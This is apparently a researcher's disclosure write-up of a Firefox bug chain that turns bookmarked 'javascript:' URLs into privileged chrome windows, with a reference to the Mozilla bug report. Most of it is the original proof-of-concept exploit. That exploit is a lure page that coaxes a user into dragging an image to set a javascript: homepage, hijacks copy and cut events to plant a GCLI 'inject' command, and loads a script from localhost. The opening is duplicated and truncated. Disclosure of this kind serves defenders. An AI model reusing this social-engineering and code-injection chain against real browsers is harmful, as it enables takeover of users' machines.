### The Main Bug The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE! After some time I was able to come up with a highly user-interactive proof of concept, best I could do given everything. The following is the original PoC reported (note: localhost/q.js hosts the [payload](https://twitter.com/Qab/status/806891824354836480)): ``` <!-- Content of the base64'd stuff: ----------------------------------------------------------- <b>jQuery needs to be included first!<br>Hold down Shift+F2 and copy paste the below code into the input that appears and hit enter</b> <br><br><br><input id="qc" style="width:300px;" value="inject 'http://jquery.cdn.mozilla.org'"/> <script> var pad=' '.repeat(1000); var inj="inject...
### The Main Bug The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE! After some time I was able to come up with a highly user-interactive proof of concept, best I could do given everything. The following is the original PoC reported (note: localhost/q.js hosts the [payload](https://twitter.com/Qab/status/806891824354836480)): ``` <!-- Content of the base64'd stuff: ----------------------------------------------------------- <b>jQuery needs to be included first!<br>Hold down Shift+F2 and copy paste the below code into the input that appears and hit enter</b> <br><br><br><input id="qc" style="width:300px;" value="inject 'http://jquery.cdn.mozilla.org'"/> <script> var pad=' '.repeat(1000); var inj="inject 'http://jquery.cdn.mozilla.org"+pad+"@localhost/q.js'"; qc.oncopy=function(e){ e.clipboardData.setData('text/plain',inj) e.preventDefault(); setTimeout("location.reload()",100) } qc.oncut=function(e){ e.clipboardData.setData('text/plain',inj) e.preventDefault(); qc.value=''; setTimeout("location.reload()",100) } </script> ------------------------------------------------------------ --> <h3>A surprise is waiting for you...</h3> <h2>Drag and drop the image below onto the small 'home' icon on the top right corner (choose yes). After that press the home button and further instructions will follow.</h2> <img src="http://i.imgur.com/0PhK7.png" id="qimg"/> <br><br><br> <script> qimg.ondragstart=function(ev){ ev.dataTransfer.clearData(); ev.dataTransfer.setData('text/plain',"http://aPageThatTellsYouToGoToOtherTab.ltd|javascript:atob('PGI+alF1ZXJ5IG5lZWRzIHRvIGJlIGluY2x1ZGVkIGZpcnN0ITxicj5Ib2xkIGRvd24gU2hpZnQrRjIgYW5kIGNvcHkgcGFzdGUgdGhlIGJlbG93IGNvZGUgaW50byB0aGUgaW5wdXQgdGhhdCBhcHBlYXJzIGFuZCBoaXQgZW50ZXI8L2I+Cjxicj48YnI+PGJyPjxpbnB1dCBpZD0icWMiIHN0eWxlPSJ3aWR0aDozMDBweDsiIHZhbHVlPSJpbmplY3QgJ2h0dHA6Ly9qcXVlcnkuY2RuLm1vemlsbGEub3JnJyIvPgoKCjxzY3JpcHQ+CnZhciBwYWQ9JyAnLnJlcGVhdCgxMDAwKTsKdmFyIGluaj0iaW5qZWN0ICdodHRwOi8vanF1ZXJ5LmNkbi5tb3ppbGxhLm9yZyIrcGFkKyJAbG9jYWxob3N0L3EuanMnIjsKCnFjLm9uY29weT1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpzZXRUaW1lb3V0KCJsb2NhdGlvbi5yZWxvYWQoKSIsMTAwKQp9CgpxYy5vbmN1dD1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpxYy52YWx1ZT0nJzsKc2V0VGltZW91dCgibG9jYXRpb24ucmVsb2FkKCkiLDEwMCkKfQo8L3NjcmlwdD4=')"); } </script> ``` In total there are four different bugs in play: * The main bug where javascript urls turn to chrome window after refresh. * The ability to set a javascript url as homepage * Bypassing paste warning of WebConsole by using GCLI instead * Ability of GCLI to inject arbitrary code into chrome windows ### References: The report: https://bugzilla.mozilla.org/show_bug.cgi?id=1318911
